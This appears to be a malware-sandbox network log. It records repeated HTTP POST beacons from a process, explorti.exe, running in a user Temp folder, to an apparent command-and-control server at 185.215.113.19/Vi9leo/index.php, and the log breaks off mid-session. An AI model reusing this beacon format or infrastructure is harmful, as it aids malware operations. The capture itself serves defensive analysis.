61	192.168.2.5	49810	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:12.474466085 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:29:13.227047920 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.5	49811	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:13.380008936 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:29:14.451003075 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 1, 2024 06:29:14.451461077 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.5	49814	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:14.461930037 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:29:15.227174997 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.5	49816	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:15.743700981 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:29:16.491440058 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.5	49817	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:16.502943039 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:29:17.255386114 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.5	49821	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:17.378817081 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:29:18.155459881 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.5	49822	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:18.253329992 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:29:19.001241922 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.5	49823	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:19.118055105 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:29:19.878963947 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.5	49824	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:19.887573004 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:29:20.632952929 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.5	49825	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:20.755028009 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:29:21.499407053 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.5	49826	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:21.509162903 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:29:22.265548944 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.5	49827	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:22.380023003 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:29:23.156466961 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.5	49828	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:23.164529085 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:29:23.905347109 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.5	49829	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:24.023545980 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:29:24.763540983 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.5	49830	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:24.797278881 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:29:25.546262980 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.5	49831	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:25.675277948 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:29:26.413561106 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 1, 2024 06:29:26.416425943 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:29:26.662632942 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.5	49832	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:26.785995960 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:29:27.526109934 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.5	49833	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:27.538860083 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:29:28.311253071 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.5	49834	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:28.451148033 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:29:29.409816027 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 1, 2024 06:29:29.410362959 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.5	49835	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:29.440382957 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:29:30.184772968 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.5	49836	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:30.301206112 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:29:31.043066978 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.5	49837	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
